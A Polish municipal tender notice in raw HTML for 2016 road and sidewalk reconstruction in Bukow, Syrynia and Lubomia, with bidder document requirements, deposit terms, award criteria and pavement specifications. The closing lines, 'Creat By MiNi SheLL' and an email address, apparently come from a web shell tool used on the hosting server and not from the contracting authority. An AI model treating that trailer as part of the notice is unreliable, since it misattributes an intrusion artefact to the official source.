i) informacji z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1pkt 13,14     i 21 Ustawy oraz odnośnie skazania za wykroczenie na karę aresztu w zakresie art.24 ust.5 pkt.5 i 6 Ustawy, wystawionej nie wcześniej niż 6 miesięcy od terminu składania ofert.
j)aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie   w całości wykonywania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców odpowiedni dokument musi być złożony przez każdego z nich);
k) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych, lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonywania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców odpowiedni dokument musi być złożony przez każdego z nich);
l) kosztorysy ofertowe
ł) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;
m) opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Zgodnie z art. 26 ust. 2c Ustawy jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej wymaganych przez zamawiającego, może złożyć inny dokument,  który  w  wystarczający  sposób  potwierdza  spełnianie  opisanego  przez zamawiającego warunku udziału w postępowaniu.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Każdy Wykonawca zobowiązany jest wnieść przed upływem terminu składania ofert, wadium w wysokości: 
2 000 PLN (słownie: dwa tysiące złotych) dla części I.
5 000 PLN (słownie: pięć tysięcy złotych) dla części II.
1)Wadium może być wniesione w jednej lub kilku następujących formach:
a)pieniądzu;
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)gwarancjach bankowych;
d)gwarancjach ubezpieczeniowych;
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy    z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3.W przypadku składania przez Wykonawcę wadium w formie gwarancji i/lub poręczenia, gwarancja i/lub poręczenie powinna być sporządzona zgodnie z obowiązującym prawem.
4.Miejsce i sposób wniesienia wadium:
1)Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:
nr 42 8469 0009 0010 3408 2000 0004 w Banku Spółdzielczym Gorzyce
W tytule przelewu należy wskazać, że jest to wadium w postępowaniu o numerze 
RI.271.04.2016.RS oraz podać część postępowania.
Do oferty należy dołączyć potwierdzenie przelewu środków na rachunek Zamawiającego. 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>90</td></tr><tr><td>Okres gwarancji</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiany do Umowy możliwe są jedynie w trybie art. 144 ustawy. Zmiana Umowy może nastąpić jedynie na piśmie pod rygorem nieważności. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty oraz określa  następujące warunki takiej zmiany poprzez zmianę odpowiednio sposobu realizacji robót, okresu i terminów ich realizacji i/lub ceny :
a)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Robót;
b) zmiany stawki urzędowej podatku VAT, przy czym w takim przypadku zmianie ulegnie stawka podatku VAT, kwota podatku VAT i kwota ceny brutto;
c)rezygnacji z części robót, jeżeli taka rezygnacja będzie niezbędna dla prawidłowej realizacji Umowy;
d)wystąpienia konieczności wprowadzenia zmiany osób personelu Wykonawcy z przyczyn niezależnych od Wykonawcy;
e) zawieszenia robót lub zmiany w przewidywanych terminach ich wykonywania;
e)uzasadnionych, niezawinionych przez Wykonawcę przerw w realizacji Umowy spowodowanych siłą wyższą; 
f)wystąpienia w trakcie realizacji Umowy konieczności wykonania robót zamiennych, uzupełniających  i dodatkowych,
g)zmiany osób upoważnionych do kontaktów w związku z realizacją Umowy;
h)zmiany rachunku bankowego i innych danych zarówno Wykonawcy, jak i Zamawiającego;
i)istotnych okoliczności mających wpływ na realizację robót, których nie można było przewidzieć w chwili zawarcia Umowy
j)konieczności uzyskania decyzji o zmianie decyzji o pozwoleniu na budowę (tzw. pozwolenia zamiennego) skutkującej koniecznością wykonania tzw. dokumentacji zamiennej,
k)konieczności usunięcia wad w dostarczonej przez Zamawiającego dokumentacji projektowej, specyfikacjach technicznych i/lub innych dokumentach niezbędnych do realizacji Przedmiotu Kontraktu,
l)nieuzyskania w terminie niezbędnym do rozpoczęcia lub zakończenia Robót dostępu do miejsca poboru wody i/lub energii elektrycznej na potrzeby realizacji Przedmiotu Kontraktu, z przyczyn, za które Wykonawca nie ponosi odpowiedzialności,
ł)wystąpienia w trakcie realizacji Przedmiotu Umowy wykopalisk, niewypałów lub niewybuchów.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 13/09/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Przebudowa dróg gminnych: Część I: 1.Przebudowa dwóch bocznych odcinków ul. Głównej w Bukowie 2.Przebudowa ul. 3-go Maja boczna w Syryni na odc. od pos. Nr 70 do pos. Nr 66 3.Przebudowa ul. 3-go Maja boczna w Syryni na odc. od pos. Nr 28 do ul. Kościelnej 4.Przebudowa drogi gminnej ul. boczna Dąbrowy w Syryni na odcinku od posesji 18 do  posesji nr 17<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część I
1.Przebudowa dwóch bocznych odcinków ul. Głównej w Bukowie
a) boczna ul. Głównej w Bukowie odcinek od ul. Głównej  do farmy drobiu nr działki 148 dł.130,0 m szer.3,5m
konstrukcja nawierzchni; 
-w-wa ścieralna z betonu asfaltowego AC11S 50/70 gr. 4 cm
-w-wa wiążąca z betonu asfaltowego gr. AC16 50/70 4 cm
-podbudowa zasadnicza z kruszywa łamanego gr. w-wy 20 cm
-w-wa odsączająca z piasku gr. 10 cm
Odwodnienie powierzchniowe na przyległe tereny
b) boczna ul. Głównej w Bukowie odcinek od ul. Głównej  do granicy pos. nr 16 działki nr 
874/140, 675/133, 1146/139,  1145/139, 674/133  dł.50,0 m szer.3,0m
-w-wa ścieralna z betonu asfaltowego AC11S 50/70 gr. 5 cm
-w-wa wiążąca z betonu asfaltowego gr. AC16 50/70 7 cm
-podbudowa zasadnicza z kruszywa łamanego gr. w-wy 20 cm
-w-wa odsączająca z piasku gr. 23 cm
Jezdnia obramowana krawężnikiem 15*30 na ławie betonowej z oporem, na wjazdach krawężnik najazdowy.
2.Przebudowa ul. 3-go Maja boczna w Syryni na odc. od pos. Nr 70 do pos. Nr 66
Przedmiotem zadania jest przebudowa ul. 3-do Maja bocznej na odcinku od posesji nr 70 (skrzyżowanie z ul. 3-go Maja; początek opracowania) do posesji nr 66. Ulica 3-go Maja boczna jest droga dojazdową (kl. D) i drogą gminną o kategorii ruchu KR 1.
Długość remontowanego odcinka drogi wynosi 116,40 m. Szerokość jezdni będzie wynosiła 3,0-3,5 m. Nawierzchnia jezdni zostanie ograniczona krawężnikami: wtopionymi o wymiarach 12x25 cm posadowionymi na ławie betonowej, krawężnikami wystającymi o wymiarach 15x30 cm oraz najazdowymi (15x22 cm) posadowionymi na ławie betonowej z oporem. Ławy wykonane zostaną z betonu kl. C12/15. Zaprojektowano jednostronny spadek jezdni    o wartości 2,0% w kierunku działek o numerach 1677/114, 2178/114 i 795/110. Od strony działek 2178/114 i 1677/114 ułożone zostaną krawężniki zwykłe i najazdowe. Na pozostałym odcinku zaprojektowano krawężniki wtopione.
Zaprojektowano następujące warstwy konstrukcyjne na jezdni: 
- Warstwa ścieralna z betonu asfaltowego AC11S gr. 4,0 cm 
-Warstwa wiążąca z betonu asfaltowego AC16W gr. 4,0 cm 
-Podbudowa tłuczniowa w  wa górna fr. 0/31,5 mm gr. 8,0 cm 
-Podbudowa tłuczniowa w  wa dolna fr. 31,5/63 mm gr. 15 cm 
-Warstwa odsączająca - podsypka piaskowa gr. 15,0 cm
Łączna grubość warstw konstrukcyjnych wynosiła będzie 46,0 cm.
Odwodnienie
Wody opadowe i roztopowe zostaną odprowadzone poprzez zaprojektowane spadki poprzeczne i podłużne na pobocze tłuczniowe, a następnie na istniejące pobocze trawiaste (działka gminna 795/110).
3.Przebudowa ul. 3-go Maja boczna w Syryni na odc. od pos. Nr 28 do ul. Kościelnej
Przedmiotem zadania jest przebudowa ul. 3-do Maja bocznej na odcinku od posesji nr 28 (skrzyżowanie z ul. 3-go Maja; początek opracowania) do skrzyżowania z ul. Kościelną. Ulica 3-go Maja boczna jest droga dojazdową (kl. D) i drogą gminną o kategorii ruchu KR 1.
Długość remontowanego odcinka drogi wynosi 141,20 m. Szerokość jezdni będzie wynosiła 3,50 m.
Nawierzchnia jezdni zostanie ograniczona krawężnikami wtopionymi o wymiarach 12x25 cm, wystającymi o wymiarach 15x30 cm i najazdowymi o wymiarach 15x22 cm (wg rysunku Projekt zagospodarowania terenu). Krawężniki zostaną posadowione na ławach betonowych z betonu kl. C12/15. Zaprojektowano jednostronny spadek jezdni o wartości 2,0%              w kierunku remontowanego parkingu oraz stawu. Spadek parkingu (również  o wartości 2,0%) skierowany będzie w stronę jezdni, zaś na połączeniu jezdni i parkingu zaprojektowano korytko odpływowe betonowe posadowione na ławie betonowej (kl. C12/15).
Zaprojektowano następujące warstwy konstrukcyjne na jezdni:
-Warstwa ścieralna z betonu asfaltowego AC11S gr. 4,0 cm 
-Warstwa wiążąca z betonu asfaltowego AC16W gr. 4,0 cm 
-Podbudowa tłuczniowa w  wa górna fr. 0/31,5 mm gr. 8,0 cm
-Podbudowa tłuczniowa w  wa dolna fr. 31,5/63 mm gr. 15 cm 
-Warstwa odsączająca - podsypka piaskowa gr. 15,0 cm
Łączna grubość warstw konstrukcyjnych wynosiła będzie 46,0 cm.
Odwodnienie
Wody opadowe i roztopowe zostaną odprowadzone poprzez zaprojektowane spadki poprzeczne i podłużne na pobocze tłuczniowe, a następnie na istniejące pobocze trawiaste (w sąsiedztwie stawu) oraz do projektowanej kratki ściekowej zlokalizowanej                       w sąsiedztwie istniejącej studni rewizyjnej. Na odcinku od skrzyżowania z drogą powiatową do projektowanej kratki ściekowej ułożone zostanie korytko odpływowe z elementów betonowych. Projektowana kratka ściekowa z wpustem jezdniowym kl. D400 wykonana będzie z kręgów betonowych o średnicy 500 mm i połączona zostanie  z istniejącą studnią rewizyjną przykanalikiem z rur PVC-U kl. S 160 mm.
4. Przebudowa drogi gminnej ul. boczna Dąbrowy w Syryni na odcinku od posesji 18 do  posesji nr 17
Przedmiotem zadania jest przebudowa ul. bocznej Dąbrowy na odcinku od pos.nr 18 do pos. Nr 17. Długość odcinka wynosi 118,5m szer.3,0mNawierzchnia jezdni zostanie ograniczona krawężnikami wtopionymi 12x25 cm oraz wystającymi 15x30 na długości skarpy.
Zaprojektowano następujące warstwy konstrukcyjne na jezdni:
-Warstwa ścieralna z betonu asfaltowego AC11S gr. 4,0 cm 
-Warstwa wiążąca z betonu asfaltowego AC16W gr. 4,0 cm 
-Podbudowa tłuczniowa w  wa górna fr. 0/31,5 mm gr. 8,0 cm
-Podbudowa tłuczniowa w  wa dolna fr. 31,5/63 mm gr. 15 cm 
-Warstwa odsączająca - podsypka piaskowa gr. 15,0 cm
Łączna grubość warstw konstrukcyjnych wynosiła będzie 46,0 cm.
Wody opadowe i roztopowe zostaną odprowadzone poprzez zaprojektowane spadki poprzeczne i podłużne na pobocze.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233123-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>90</td></tr><tr><td>okres gwarancji</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Przebudowa dróg gminnych:Część II 1.Przebudowa ulicy Nepomucena w Lubomi.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Celem opracowania jest zaprojektowanie remontu ul. Nepomucena w zakresie obejmującym przebudowę chodnika wraz z kanalizacją deszczową.
Zakres kanalizacji do wykonania w ramach ogłoszonego postępowania obejmuje wykonanie kanalizacji deszczowej na odcinku (zgodnie z załączonym rysunkiem zakresu kanalizacji) od D-19 km 0+820 do D-31 km 1+280. Studzienki ściekowe  tylko po stronie prawej, wyprowadzenie  zaślepionego przykanalika  dla kratek po lewej stronie na długości chodnika. Na pozostałym odcinku chodnika wykonać nowe studnie rewizyjne na istniejącej kanalizacji oraz wyregulować istniejące kratki.
Konstrukcja projektowanych chodników jak niżej:
kostka brukowa betonowa szara gr. 6cm podsypka cementowo  piaskowa gr. 5cm podbudowa z kruszywa łamanego gr. 15cm
Wjazdy indywidualne do posesji w ciągu projektowanych chodników posiadać będą nawierzchnię z kostki brukowej betonowej kolor, połączenie wjazdów z krawędzią jezdni wykonane za pomocą skosów 1:1.
Wjazdy indywidualne do posesji w ciągu projektowanego pobocza będą posiadać będą nawierzchnię z betonu asfaltowego jak również nawierzchnię z kostki brukowej betonowej, połączenie krawędzi wjazdu z krawędzią jezdni łukiem R = 3,00m.
Konstrukcja projektowanych wjazdów o nawierzchni z kostki brukowej:
kostka brukowa betonowa kolor gr. 8cm podsypka cementowo  piaskowa gr. 5cm podbudowa z kruszywa kamiennego gr. 20cm
Konstrukcja projektowanych wjazdów o nawierzchni z betonu asfaltowego:
warstwa ścieralna z betonu asfaltowego gr. 5cm podbudowa z kruszywa łamanego gr. 20cm warstwa odsączająca z piasku gr. 15cm
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45231300-8, 45233253-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>90</td></tr><tr><td>okres gwarancji</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com